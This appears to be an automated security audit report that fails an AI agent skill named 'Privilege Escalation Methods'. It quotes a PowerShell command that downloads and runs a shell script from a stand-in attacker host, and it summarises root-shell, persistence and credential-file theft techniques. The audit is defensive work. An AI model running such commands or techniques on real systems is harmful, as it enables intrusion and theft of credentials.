Privilege Escalation Methods
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains commands that download and execute scripts from external sources at runtime.
- Evidence in 'sub-skills/active-directory-attacks.md' uses 'powershell.exe -c iex (iwr http://attacker/shell.ps1)' to execute a remote payload.
- [COMMAND_EXECUTION]: Extensive use of commands to gain elevated privileges and manipulate system services.
- Evidence in 'sub-skills/linux-privilege-escalation.md' demonstrates abusing sudo with binaries like vim, find, and awk to spawn root shells.
- Evidence in 'sub-skills/windows-privilege-escalation.md' uses tools like SweetPotato and PowerUp to abuse system tokens and services.
- Evidence in 'sub-skills/active-directory-attacks.md' uses schtasks to create persistent tasks for command execution.
- [DATA_EXFILTRATION]: Provides methods to access and copy highly sensitive system files containing credentials and keys.
- Evidence in 'sub-skills/credential-harvesting.md' includes instructions to copy the NTDS.dit database and SYSTEM registry hive using Volume Shadow Copies.
- Evidence in 'sub-skills/linux-privilege-escalation.md' uses tar to read and package private SSH keys from /root/.ssh/id_rsa.
- [EXTERNAL_DOWNLOADS]: Recommends downloading and using a wide variety of third-party exploitation tools from unknown or untrusted sources.
- Evidence in 'SKILL.md' lists tools such as Mimikatz, Rubeus, Impacket, Responder, PowerView, and PowerUpSQL.
Recommendations
- AI detected serious security threats
Audit Metadata